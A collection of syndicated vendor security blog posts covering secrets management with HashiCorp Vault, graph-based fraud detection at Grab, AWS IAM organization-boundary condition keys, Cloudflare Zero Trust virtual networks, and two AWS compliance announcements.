Many applications these days require authentication to external systems with resources, such as users and passwords to access databases and service accounts to access cloud services, and so on. In such cases, private information, like passwords and keys, becomes necessary. It is essential to take extra care in managing such sensitive data. For example, if you write your AWS key information or password in a script for deployment and then push it to a Git repository, all users who can read it will also be able to access it, and you could be in trouble. Even if it’s an internal repository, you run the risk of a potential leak.

How we were managing secrets in the service

Before we talk about Vault, let’s take a look at how we’ve used to manage secrets.

Salt

We use SaltStack as a bare-metal configuration management tool. The core of the Salt ecosystem consists of two major components: the Salt Master and the Salt Minion. The configuration state is owned by Salt Master, and thousands of Salt Minions automatically install packages, generate configuration files, and start services to the node based on the state. The state may contain secrets, such as passwords and API keys. When we deploy secrets to the node, we encrypt plaintext using a Salt Master owned GPG key and fill an ASCII-armored secret into the state file. Once it is applied, the Salt Master decrypts the PGP message using its own key, then the Salt Minion retrieves rendered data from the Master.

Secret Management with HashiCorp Vault

Kubernetes

We were using Lockbox, a secure way to store your Kubernetes secrets offline. The secret is asymmetrically encrypted and can only be decrypted with the Lockbox Kubernetes controller. The controller synchronizes with Secret objects. A Secret generated from Lockbox will also be created in the corresponding namespace. Since namespaces have been assigned administrator privileges by each engineering team, ordinary users cannot read Secret objects.

Secret Management with HashiCorp Vault

Why these secrets management were insufficient

Prior to Vault, GnuPG and Lockbox were used in this way to encrypt and decrypt most secrets in the data center. Nevertheless, they were inadequate in certain cases:

  • Lack of scoping secrets: The secret data in ASCII-armor could only be decrypted by a specific node when the client read it. This was still not enough control. Salt owns a GPG key for each Salt Master, and Core services (k8s, Databases, Storage, Logging, Tracing, Monitoring, etc) are deployed to hundreds of Salt Minions by a few Salt Masters. Nodes are often reused as different services after repairing hardware failure, so we use the same GPG key to decrypt the secrets of various services. Therefore, having a GPG key for each service is complicated. Also, a specific secret is used only for a specific service. For example, an access key for object storage is needed to back up the repository. In previous configurations, the API key is decrypted by a common Salt Master, so there is a risk that the API key will be referenced by another service or for another purpose. It is impossible to scope secret access, as long as we use the same GPG key.

    Another case is Kubernetes. Namespace-scoped access control and API access restrictions by the RBAC model are excellent. And the etcd used by Kubernetes as storage is not encrypted by default, and the Secret object is also saved. We need to think about encryption-at-rest by a third party KMS, or how to prevent Secrets from being stored in etcd. In other words, it is also required to properly control access to the secret for the secret itself.

  • Rotation and static secret: Anyone who has access to the Salt Master GPG key can theoretically decrypt all current and future secrets. And as long as we have many secrets, it’s impossible to rotate the encryption of all the secrets. Current and future secret management requires a process for easy rotation and using dynamically generated secrets instead.
  • Session management: Users/Services with GPG keys can decrypt secrets at any time. So GPG secret decryption is like having no TTL. (You can set an expiration date against the GPG key, but it’s just metadata. If you try to encrypt a new secret, after the expiration date, you’ll get a warning, but you can decrypt the existing secret). A temporary session is required to limit access when not needed.
  • Audit: GPG doesn’t have a way to keep an audit trail. Audit trails help us to trace the event who/when/where read secrets. The audit trail should contain details including the date, time, and user information associated with the secret read (and login), which is required regardless of user or service.

HashiCorp Vault

Armed with our set of requirements, we chose HashiCorp Vault to make better secret management with a better security model.

  • Scoping secrets: When a client logs in, a Vault token is generated through the Auth method (backend). This token has a policy that defines access policies, so it is clear what the client can access the data after logging in.
  • Rotation and dynamic secret: Version-controlled static secret with KV V2 Secret Engine helps us to easily update/rollback secrets with a single request. In addition, dynamic secrets and credentials are available to eliminate manual rotation. Ideally, these are required to be short-lived and have frequent rotation. Service should have restricted access. These are essential to reduce the impact of an attack, but they are operationally difficult, and it is impossible to satisfy them without automation. Vault can solve this problem by allowing operators to provide dynamically generated credentials to their services. Vault manages the credential lifecycle and rotates and revokes it as needed.
  • Session management: Vault provides a login process to get the token and various auth methods are provided. It is possible to link with an Identity Provider and authenticate using JWT. Since the vault token has a TTL, it can be managed as a short-lived credential to access secrets.
  • Audit: Vault supports audit that records who accessed which Vault API, when, and from where.

We also built Vault clusters for HA, Reliability, and handling large numbers of requests.

  • Use Integrated Storage that every node in the Vault cluster has a duplicate copy of Vault’s data. A client can retrieve the same result from any node.
  • Performance Replication offers us the same result as any Vault clusters.
  • Requests from clients are routed from a single Service IP to one of the Clusters. Anycast routes incoming traffic to the nearest cluster that handles requests efficiently. If one cluster goes down, the request will be automatically routed to another available cluster.
Secret Management with HashiCorp Vault

Service integrations

Use the appropriate Auth backend and Secret Engine to integrate the Service and Vault that are responsible for each core component.

Salt

The configuration state is owned by Salt Master, and hundreds of Salt Minions automatically install packages, generate configuration files, and start services to the node based on the role. The state data may contain secrets, such as API keys, and Salt Minion retrieves them from Vault. Salt uses a JWT signed by the Salt Master to log in to the vault using the JWT Auth method.

Secret Management with HashiCorp Vault

Kubernetes

Kubernetes reads Vault secrets through an operator that synchronizes with Secret objects. The Kubernetes Auth method uses the Service Account token JWT to login, just like the JWT Auth method. This JWT contains the service account name, UID, and namespace. Vault can scope namespace based on dynamic policy.

Secret Management with HashiCorp Vault

Identity Provider – User login

Additionally, Vault can work with the Identity Provider through a delegated authorization method based on OAuth 2.0 so that users can get tokens with the right policies. The JWT issued by the Identity Provider contains the group or user ID to which it belongs, and this metadata can be used to assign a Vault policy.

Secret Management with HashiCorp Vault

Integrated ecosystem – Auth x Secret

Vault provides a plugin system for two major components: authentication (Auth method) and secret management (Secret Engine). Vault can enable the officially provided plugins and the custom plugins you can build. The Auth method provides authentication for obtaining a Vault token by various methods. As mentioned in the service integration example above, we mainly use JWT, OIDC, and Kubernetes for login. On the other hand, the secret engine provides secrets in various ways, such as KV for a static secret, PKI for certificate signing, issuing, etc.

And they have an ecosystem. Vault can easily integrate auth methods and secret engines with each other. For instance, if we add a DB dynamic credential secret engine, all existing platforms will instantly be supported, without needing to reinvent the wheel, on how they will auth to a separate service. Similarly, we can add a platform into the mix, and it would instantly have access to all the existing secret engines and their functionalities. Additionally, the Vault can perform permission to the arbitrary endpoint path provided by secret engines based on the authentication method and policies.

Wrap up

Vault integration for the core component is already ongoing and many GPG secrets have been migrated to Vault. We aim to make service integrations in our data centers, dynamic credentials, and improve CI/CD for Vault. Interested? We’re hiring for security platform engineering!

Graph Networks – Striking fraud syndicates in the dark

Post Syndicated from Grab Tech original https://engineering.grab.com/graph-networks


As a leading superapp in Southeast Asia, Grab serves millions of consumers daily. This naturally makes us a target for fraudsters and to enhance our defences, the Integrity team at Grab has launched several hyper-scaled services, such as the Griffin real-time rule engine and Advanced Feature Engineering. These systems enable data scientists and risk analysts to develop real-time scoring, and take fraudsters out of our ecosystems.

Apart from individual fraudsters, we have also observed the fast evolution of the dark side over time. We have had to evolve our defences to deal with professional syndicates that use advanced equipment such as device farms and GPS spoofing apps to perform fraud at scale. These professional fraudsters are able to camouflage themselves as normal users, making it significantly harder to identify them with rule-based detection.

Since 2020, Grab’s Integrity team has been advancing fraud detection with more sophisticated techniques and experimenting with a range of graph network technologies such as graph visualisations, graph neural networks and graph analytics. We’ve seen a lot of progress in this journey and will be sharing some key learnings that might help other teams who are facing similar issues.

What are Graph-based Prediction Platforms?

“You can fool some of the people all of the time, and all of the people some of the time, but you cannot fool all of the people all of the time.” – Abraham Lincoln

A Graph-based Prediction Platform connects multiple entities through one or more common features. When such entities are viewed as a macro graph network, we uncover new patterns that are otherwise unseen to the naked eye. For example, when investigating if two users are sharing IP addresses or devices, we might not be able to tell if they are fraudulent or just family members sharing a device.

However, if we use a graph system and look at all users sharing this device or IP address, it could show us if these two users are part of a much larger syndicate network in a device farming operation. In operations like these, we may see up to hundreds of other fake accounts that were specifically created for promo and payment fraud. With graphs, we can identify fraudulent activity more easily.

Grab’s Graph-based Prediction Platform

Leveraging the power of graphs, the team has primarily built two types of systems:

  • Graph Database Platform: An ultra-scalable storage system with over one billion nodes that powers:
    1. Graph Visualisation: Risk specialists and data analysts can review user connections real-time and are able to quickly capture new fraud patterns with over 10 dimensions of features (see Fig 1).

      Change Data Capture flow
      Fig 1: Graph visualisation
    2. Network-based feature system: A configurable system for engineers to adjust machine learning features based on network connectivity, e.g. number of hops between two users, numbers of shared devices between two IP addresses.

  • Graph-based Machine Learning: Unlike traditional fraud detection models, Graph Neural Networks (GNN) are able to utilise the structural correlations on the graph and act as a sustainable foundation to combat many different kinds of fraud. The data science team has built large-scale GNN models for scenarios like anti-money laundering and fraud detection.

    Fig 2 shows a Money Laundering Network where hundreds of accounts coordinate the placement of funds, layering the illicit monies through a complex web of transactions making funds hard to trace, and consolidate funds into spending accounts.

Change Data Capture flow
Fig 2: Money Laundering Network

What’s next?

In the next article of our Graph Network blog series, we will dive deeper into how we develop the graph infrastructure and database using AWS Neptune. Stay tuned for the next part.

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

How to control access to AWS resources based on AWS account, OU, or organization

Post Syndicated from Rishi Mehrotra original https://aws.amazon.com/blogs/security/how-to-control-access-to-aws-resources-based-on-aws-account-ou-or-organization/

AWS Identity and Access Management (IAM) recently launched new condition keys to make it simpler to control access to your resources along your Amazon Web Services (AWS) organizational boundaries. AWS recommends that you set up multiple accounts as your workloads grow, and you can use multiple AWS accounts to isolate workloads or applications that have specific security requirements. By using the new conditions, aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount, you can define access controls based on an AWS resource’s organization, organizational unit (OU), or account. These conditions make it simpler to require that your principals (users and roles) can only access resources inside a specific boundary within your organization. You can combine the new conditions with other IAM capabilities to restrict access to and from AWS accounts that are not part of your organization.

This post will help you get started using the new condition keys. We’ll show the details of the new condition keys and walk through a detailed example based on the following scenario. We’ll also provide references and links to help you learn more about how to establish access control perimeters around your AWS accounts.

Consider a common scenario where you would like to prevent principals in your AWS organization from adding objects to Amazon Simple Storage Service (Amazon S3) buckets that don’t belong to your organization. To accomplish this, you can configure an IAM policy to deny access to S3 actions unless aws:ResourceOrgID matches your unique AWS organization ID. Because the policy references your entire organization, rather than individual S3 resources, you have a convenient way to maintain this security posture across any number of resources you control. The new conditions give you the tools to create a security baseline for your IAM principals and help you prevent unintended access to resources in accounts that you don’t control. You can attach this policy to an IAM principal to apply this rule to a single user or role, or use service control policies (SCPs) in AWS Organizations to apply the rule broadly across your AWS accounts. IAM principals that are subject to this policy will only be able to perform S3 actions on buckets and objects within your organization, regardless of their other permissions granted through IAM policies or S3 bucket policies.

New condition key details

You can use the aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount condition keys in IAM policies to place controls on the resources that your principals can access. The following table explains the new condition keys and what values these keys can take.

Condition key Description Operator Single/multi value Value
aws:ResourceOrgID AWS organization ID of the resource being accessed All string operators Single value key Any AWS organization ID
aws:ResourceOrgPaths Organization path of the resource being accessed All string operators Multi-value key Organization paths of AWS organization IDs and organizational unit IDs
aws:ResourceAccount AWS account ID of the resource being accessed All string operators Single value key Any AWS account ID

Note: Of the three keys, only aws:ResourceOrgPaths is a multi-value condition key, while aws:ResourceAccount and aws:ResourceOrgID are single-value keys. For information on how to use multi-value keys, see Creating a condition with multiple keys or values in the IAM documentation.

Resource owner keys compared to principal owner keys

The new IAM condition keys complement the existing principal condition keys aws:PrincipalAccount, aws:PrincipalOrgPaths, and aws:PrincipalOrgID. The principal condition keys help you define which AWS accounts, organizational units (OUs), and organizations are allowed to access your resources. For more information on the principal conditions, see Use IAM to share your AWS resources with groups of AWS accounts in AWS Organizations on the AWS Security Blog.

Using the principal and resource keys together helps you establish permission guardrails around your AWS principals and resources, and makes it simpler to keep your data inside the organization boundaries you define as you continue to scale. For example, you can define identity-based policies that prevent your IAM principals from accessing resources outside your organization (by using the aws:ResourceOrgID condition). Next, you can define resource-based policies that prevent IAM principals outside your organization from accessing resources that are inside your organization boundary (by using the aws:PrincipalOrgID condition). The combination of both policies prevents any access to and from AWS accounts that are not part of your organization. In the next sections, we’ll walk through an example of how to configure the identity-based policy in your organization. For the resource-based policy, you can follow along with the example in An easier way to control access to AWS resources by using the AWS organization of IAM principals on the AWS Security blog.

Setup for the examples

In the following sections, we’ll show an example IAM policy for each of the new conditions. To follow along with Example 1, which uses aws:ResourceAccount, you’ll just need an AWS account.

To follow along with Examples 2 and 3 that use aws:ResourceOrgPaths and aws:ResourceOrgID respectively, you’ll need to have an organization in AWS Organizations and at least one OU created. This blog post assumes that you have some familiarity with the basic concepts in IAM and AWS Organizations. If you need help creating an organization or want to learn more about AWS Organizations, visit Getting Started with AWS Organizations in the AWS documentation.

Which IAM policy type should I use?

You can implement the following examples as identity-based policies, or in SCPs that are managed in AWS Organizations. If you want to establish a boundary for some of your IAM principals, we recommend that you use identity-based policies. If you want to establish a boundary for an entire AWS account or for your organization, we recommend that you use SCPs. Because SCPs apply to an entire AWS account, you should take care when you apply the following policies to your organization, and account for any exceptions to these rules that might be necessary for some AWS services to function properly.

Example 1: Restrict access to AWS resources within a specific AWS account

Let’s look at an example IAM policy that restricts access along the boundary of a single AWS account. For this example, say that you have an IAM principal in account 222222222222, and you want to prevent the principal from accessing S3 objects outside of this account. To create this effect, you could attach the following IAM policy.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [
            "222222222222"
          ]
        }
      }
    }
  ]
}

Note: This policy is not meant to replace your existing IAM access controls, because it does not grant any access. Instead, this policy can act as an additional guardrail for your other IAM permissions. You can use a policy like this to prevent your principals from access to any AWS accounts that you don’t know or control, regardless of the permissions granted through other IAM policies.

This policy uses a Deny effect to block access to S3 actions unless the S3 resource being accessed is in account 222222222222. This policy prevents S3 access to accounts outside of the boundary of a single AWS account. You can use a policy like this one to limit your IAM principals to access only the resources that are inside your trusted AWS accounts. To implement a policy like this example yourself, replace account ID 222222222222 in the policy with your own AWS account ID. For a policy you can apply to multiple accounts while still maintaining this restriction, you could alternatively replace the account ID with the aws:PrincipalAccount condition key, to require that the principal and resource must be in the same account (see example #3 in this post for more details how to accomplish this).

Organization setup: Welcome to AnyCompany

For the next two examples, we’ll use an example organization called AnyCompany that we created in AWS Organizations. You can create a similar organization to follow along directly with these examples, or adapt the sample policies to fit your own organization. Figure 1 shows the organization structure for AnyCompany.

Figure 1: Organization structure for AnyCompany

Figure 1: Organization structure for AnyCompany

Like all organizations, AnyCompany has an organization root. Under the root are three OUs: Media, Sports, and Governance. Under the Sports OU, there are three more OUs: Baseball, Basketball, and Football. AWS accounts in this organization are spread across all the OUs based on their business purpose. In total, there are six OUs in this organization.

Example 2: Restrict access to AWS resources within my organizational unit

Now that you’ve seen what the AnyCompany organization looks like, let’s walk through another example IAM policy that you can use to restrict access to a specific part of your organization. For this example, let’s say you want to restrict S3 object access within the following OUs in the AnyCompany organization:

  • Media
  • Sports
  • Baseball
  • Basketball
  • Football

To define a boundary around these OUs, you don’t need to list all of them in your IAM policy. Instead, you can use the organization structure to your advantage. The Baseball, Basketball, and Football OUs share a parent, the Sports OU. You can use the new aws:ResourceOrgPaths key to prevent access outside of the Media OU, the Sports OU, and any OUs under it. Here’s the IAM policy that achieves this effect.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "*",
      "Condition": {
        "ForAllValues:StringNotLike": {
          "aws:ResourceOrgPaths": [
            "o-acorg/r-acroot/ou-acroot-mediaou/",
            "o-acorg/r-acroot/ou-acroot-sportsou/*"
          ] 
        }
      }
    }
  ]
}

Note: Like the earlier example, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside an OU-defined boundary. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. In this example, we attached this policy to the root of our organization, applying it to all principals across all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in a specific set of OUs in the AnyCompany organization. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgPaths contains any of the listed OU paths. Because aws:ResourceOrgPaths is a multi-value condition, the policy uses the ForAllValues:StringNotLike operator to compare the values of aws:ResourceOrgPaths to the list of OUs in the policy.

The first OU path in the list is for the Media OU. The second OU path is the Sports OU, but it also adds the wildcard character * to the end of the path. The wildcard * matches any combination of characters, and so this condition matches both the Sports OU and any other OU further down its path. Using wildcards in the OU path allows you to implicitly reference other OUs inside the Sports OU, without having to list them explicitly in the policy. For more information about wildcards, refer to Using wildcards in resource ARNs in the IAM documentation.

Example 3: Restrict access to AWS resources within my organization

Finally, we’ll look at a very simple example of a boundary that is defined at the level of an entire organization. This is the same use case as the preceding two examples (restrict access to S3 object access), but scoped to an organization instead of an account or collection of OUs.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "arn:aws:s3:::*/*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceOrgID": "${aws:PrincipalOrgID}"
        }
      }
    }
  ]
}

Note: Like the earlier examples, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside your organization regardless of their other access permissions. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. As in the previous example, we attached this policy to the root of our organization, applying it to all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in the same organization as the IAM principal that is accessing it. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgID and aws:PrincipalOrgID must be equal to each other. With this requirement, the principal making the request and the resource being accessed must be in the same organization. This policy also applies to S3 resources that are created after the policy is put into effect, so it is simple to maintain the same security posture across all your resources.

For more information about aws:PrincipalOrgID, refer to AWS global condition context keys in the IAM documentation.

Learn more

In this post, we explored the new conditions, and walked through a few examples to show you how to restrict access to S3 objects across the boundary of an account, OU, or organization. These tools work for more than just S3, though: You can use the new conditions to help you protect a wide variety of AWS services and actions. Here are a few links that you may want to look at:

If you have any questions, comments, or concerns, contact AWS Support or start a new thread on the AWS Identity and Access Management forum. Thanks for reading about this new feature. If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Rishi Mehrotra

Rishi Mehrotra

Rishi is a Product Manager in AWS IAM. He enjoys working with customers and influencing products decisions. Prior to Amazon, Rishi worked for enterprise IT customers after receiving engineering degree in computer science. He recently pursued MBA from The University of Chicago Booth School of Business. Outside of work, Rishi enjoys biking, reading, and playing with his kids.

Author

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

Building many private virtual networks through Cloudflare Zero Trust

Post Syndicated from Nuno Diegues original https://blog.cloudflare.com/building-many-private-virtual-networks-through-cloudflare-zero-trust/

Building many private virtual networks through Cloudflare Zero Trust

We built Cloudflare’s Zero Trust platform to help companies rely on our network to connect their private networks securely, while improving performance and reducing operational burden. With it, you could build a single virtual private network, where all your connected private networks had to be uniquely identifiable.

Starting today, we are thrilled to announce that you can start building many segregated virtual private networks over Cloudflare Zero Trust, beginning with virtualized connectivity for the connectors Cloudflare WARP and Cloudflare Tunnel.

Connecting your private networks through Cloudflare

Consider your team, with various services hosted across distinct private networks, and employees accessing those resources. More than ever, those employees may be roaming, remote, or actually in a company office. Regardless, you need to ensure only they can access your private services. Even then, you want to have granular control over what each user can access within your network.

This is where Cloudflare can help you. We make our global, performant network available to you, acting as a virtual bridge between your employees and private services. With your employees’ devices running Cloudflare WARP, their traffic egresses through Cloudflare’s network. On the other side, your private services are behind Cloudflare Tunnel, accessible only through Cloudflare’s network. Together, these connectors protect your virtual private network end to end.

Building many private virtual networks through Cloudflare Zero Trust

The beauty of this setup is that your traffic is immediately faster and more secure. But you can then take it a step further and extract value from many Cloudflare services for your private network routed traffic: auditing, fine-grained filtering, data loss protection, malware detection, safe browsing, and many others.

Our customers are already in love with our Zero Trust private network routing solution. However, like all things we love, they can still improve.

The problem of overlapping networks

In the image above, the user can access any private service as if they were physically located within the network of that private service. For example, this means typing jira.intra in the browser or SSH-ing to a private IP 10.1.2.3 will work seamlessly despite neither of those private services being exposed to the Internet.

However, this has a big assumption in place: those underlying private IPs are assumed to be unique in the private networks connected to Cloudflare in the customer’s account.

Suppose now that your Team has two (or more) data centers that use the same IP space — usually referred to as a CIDR — such as 10.1.0.0/16. Maybe one is the current primary and the other is the secondary, replicating one another. In such an example situation, there would exist a machine in each of those two data centers, both with the same IP, 10.1.2.3.

Until today, you could not set up that via Cloudflare. You would connect data center 1 with a Cloudflare Tunnel responsible for traffic to 10.1.0.0/16. You would then do the same in data center 2, but receive an error forbidding you to create an ambiguous IP route:

$ cloudflared tunnel route ip add 10.1.0.0/16 dc-2-tunnel

API error: Failed to add route: code: 1014, reason: You already have a route defined for this exact IP subnet

In an ideal world, a team would not have this problem: every private network would have unique IP space. But that is just not feasible in practice, particularly for large enterprises. Consider the case where two companies merge: it is borderline impossible to expect them to rearrange their private networks to preserve IP addressing uniqueness.

Getting started on your new virtual networks

You can now overcome the problem above by creating unique virtual networks that logically segregate your overlapping IP routes. You can think of a virtual network as a group of IP subspaces. This effectively allows you to compose your overall infrastructure into independent (virtualized) private networks that are reachable by your Cloudflare Zero Trust organization through Cloudflare WARP.

Building many private virtual networks through Cloudflare Zero Trust

Let us set up this scenario.

We start by creating two virtual networks, with one being the default:

$ cloudflared tunnel vnet add —-default vnet-frankfurt "For London and Munich employees primarily"

Successfully added virtual network vnet-frankfurt with ID: 8a6ea860-cd41-45eb-b057-bb6e88a71692 (as the new default for this account)

$ cloudflared tunnel vnet add vnet-sydney "For APAC employees primarily"

Successfully added virtual network vnet-sydney with ID: e436a40f-46c4-496e-80a2-b8c9401feac7

We can then create the Tunnels and route the CIDRs to them:

$ cloudflared tunnel create tunnel-fra

Created tunnel tunnel-fra with id 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel create tunnel-syd

Created tunnel tunnel-syd with id 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

$ cloudflared tunnel route ip add --vnet vnet-frankfurt 10.1.0.0/16 tunnel-fra

Successfully added route for 10.1.0.0/16 over tunnel 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel route ip add --vnet vnet-sydney 10.1.0.0/16 tunnel-syd

Successfully added route for 10.1.0.0/16 over tunnel 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

And that’s it! Both your Tunnels can now be run and they will connect your private data centers to Cloudflare despite having overlapping IPs.

Your users will now be routed through the virtual network vnet-frankfurt by default. Should any user want otherwise, they could choose on the WARP client interface settings, for example, to be routed via vnet-sydney.

Building many private virtual networks through Cloudflare Zero Trust

When the user changes the virtual network chosen, that informs Cloudflare’s network of the routing decision. This will propagate that knowledge to all our data centers via Quicksilver in a matter of seconds. The WARP client then restarts its connectivity to our network, breaking existing TCP connections that were being routed to the previously selected virtual network. This may be perceived as if you were disconnecting and reconnecting the WARP client.

Every current Cloudflare Zero Trust organization using private network routing will now have a default virtual network encompassing the IP Routes to Cloudflare Tunnels. You can start using the commands above to expand your private network to have overlapping IPs and reassign a default virtual network if desired.

If you do not have overlapping IPs in your private infrastructure, no action will be required.

What’s next

This is just the beginning of our support for distinct virtual networks at Cloudflare. As you may have seen, last week we announced the ability to create, deploy, and manage Cloudflare Tunnels directly from the Zero Trust dashboard. Today, virtual networks are only supported through the cloudflared CLI, but we are looking to integrate virtual network management into the dashboard as well.

Our next step will be to make Cloudflare Gateway aware of these virtual networks so that Zero Trust policies can be applied to these overlapping IP ranges. Once Gateway is aware of these virtual networks, we will also surface this concept with Network Logging for auditability and troubleshooting moving forward.

LGPD workbook for AWS customers managing personally identifiable information in Brazil

Post Syndicated from Rodrigo Fiuza original https://aws.amazon.com/blogs/security/lgpd-workbook-for-aws-customers-managing-personally-identifiable-information-in-brazil/

Portuguese version

AWS is pleased to announce the publication of the Brazil General Data Protection Law Workbook.

The General Data Protection Law (LGPD) in Brazil was first published on 14 August 2018, and started its applicability on 18 August 2020. Companies that manage personally identifiable information (PII) in Brazil as defined by LGPD will have to comply with and attend to the law.

To better help customers prepare and implement controls that focus on LGPD Chapter VII Security and Best Practices, AWS created a workbook based on industry best practices, AWS service offerings, and controls.

Amongst other topics, this workbook covers information security and AWS controls from:

In combination with Brazil General Data Protection Law Workbook, customers can use the detailed Navigating LGPD Compliance on AWS whitepaper.

AWS adheres to a shared responsibility model. Customers will have to observe which services offer privacy features and determine their applicability to their specific compliance requirements. Further information about data privacy at AWS can be found at our Data Privacy Center. Specific information about LGPD and data privacy at AWS in Brazil can be found on our Brazil Data Privacy page.

To learn more about our compliance and security programs, see AWS Compliance Programs. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.
Want more AWS Security news? Follow us on Twitter.
 


Portuguese

Workbook da LGPD para Clientes AWS que gerenciam Informações de Identificação Pessoal no Brasil

A AWS tem o prazer de anunciar a publicação do Workbook Lei Geral de Proteção de Dados do Brasil.

A Lei Geral de Proteção de Dados (LGPD) teve sua primeira publicação em 14 de agosto de 2018 no Brasil e iniciou sua aplicabilidade em 18 de agosto de 2020. Empresas que gerenciam informações pessoais identificáveis (PII) conforme definido na LGPD terão que cumprir e atender às cláusulas da lei.

Para ajudar melhor os clientes a preparar e implementar controles que se concentram no Capítulo VII da LGPD “da Segurança e Boas Práticas”, a AWS criou uma pasta de trabalho com base nas melhores práticas do setor, ofertas de serviços e controles da AWS.

Entre outros tópicos, esta pasta de trabalho aborda a segurança da informação e os controles da AWS de:

Em combinação com o Workbook Lei Geral de Proteção de Dados do Brasil, os clientes podem usar o whitepaper detalhado Navegando na conformidade com a LGPD na AWS.

A AWS adere a um modelo de responsabilidade compartilhada. Clientes terão que observar quais serviços oferecem recursos de privacidade e determinar sua aplicabilidade aos seus requisitos específicos de compliance. Mais informações sobre a privacidade de dados na AWS podem ser encontradas em nosso Centro de Privacidade de Dados. Informações adicionais sobre LGPD e Privacidade de dados na AWS no Brasil podem ser encontradas em nossa página de Privacidade de Dados no Brasil.

Para saber mais sobre nossos programas de conformidade e segurança, consulte Programas de conformidade da AWS. Como sempre, valorizamos seus comentários e perguntas; entre em contato com a equipe de conformidade da AWS por meio da página Fale conosco.

Se você tiver feedback sobre esta postagem, envie comentários na seção Comentários abaixo.

Quer mais notícias sobre segurança da AWS? Siga-nos no Twitter.

Author

Rodrigo Fiuza

Rodrigo is a Security Audit Manager at AWS, based in São Paulo. He leads audits, attestations, certifications, and assessments across Latin America, Caribbean and Europe. Rodrigo has previously worked in risk management, security assurance, and technology audits for the past 12 years.

Canadian Centre for Cyber Security Assessment Summary report now available in AWS Artifact

Post Syndicated from Rob Samuel original https://aws.amazon.com/blogs/security/canadian-centre-for-cyber-security-assessment-summary-report-now-available-in-aws-artifact/

French version

At Amazon Web Services (AWS), we are committed to providing continued assurance to our customers through assessments, certifications, and attestations that support the adoption of AWS services. We are pleased to announce the availability of the Canadian Centre for Cyber Security (CCCS) assessment summary report for AWS, which you can view and download on demand through AWS Artifact.

The CCCS is Canada’s authoritative source of cyber security expert guidance for the Canadian government, industry, and the general public. Public and commercial sector organizations across Canada rely on CCCS’s rigorous Cloud Service Provider (CSP) IT Security (ITS) assessment in their decision to use CSP services. In addition, CCCS’s ITS assessment process is a mandatory requirement for AWS to provide cloud services to Canadian federal government departments and agencies.

The CCCS Cloud Service Provider Information Technology Security Assessment Process determines if the Government of Canada (GC) ITS requirements for the CCCS Medium Cloud Security Profile (previously referred to as GC’s PROTECTED B/Medium Integrity/Medium Availability [PBMM] profile) are met as described in ITSG-33 (IT Security Risk Management: A Lifecycle Approach, Annex 3 – Security Control Catalogue). As of September, 2021, 120 AWS services in the Canada (Central) Region have been assessed by the CCCS, and meet the requirements for medium cloud security profile. Meeting the medium cloud security profile is required to host workloads that are classified up to and including medium categorization. On a periodic basis, CCCS assesses new or previously unassessed services and re-assesses the AWS services that were previously assessed to verify that they continue to meet the GC’s requirements. CCCS prioritizes the assessment of new AWS services based on their availability in Canada, and customer demand for the AWS services. The full list of AWS services that have been assessed by CCCS is available on our Services in Scope by Compliance Program page.

To learn more about the CCCS assessment or our other compliance and security programs, visit AWS Compliance Programs. If you have questions about this blog post, please start a new thread on the AWS Artifact forum or contact AWS Support.

If you have feedback about this post, submit comments in the Comments section below. Want more AWS Security news? Follow us on Twitter.

Rob Samuel

Rob Samuel

Rob Samuel is a Principal technical leader for AWS Security Assurance. He partners with teams across AWS to translate data protection principles into technical requirements, aligns technical direction and priorities, orchestrates new technical solutions, helps integrate security and privacy solutions into AWS services and features, and addresses cross-cutting security and privacy requirements and expectations. Rob has more than 20 years of experience in the technology industry, and has previously held leadership roles, including Head of Security Assurance for AWS Canada, Chief Information Security Officer (CISO) for the Province of Nova Scotia, various security leadership roles as a public servant, and served as a Communications and Electronics Engineering Officer in the Canadian Armed Forces.

Naranjan Goklani

Naranjan Goklani

Naranjan Goklani is a Security Audit Manager at AWS, based in Toronto (Canada). He leads audits, attestations, certifications, and assessments across North America and Europe. Naranjan has more than 12 years of experience in risk management, security assurance, and performing technology audits. Naranjan previously worked in one of the Big 4 accounting firms and supported clients from the retail, ecommerce, and utilities industries.

Brian Mycroft

Brian Mycroft

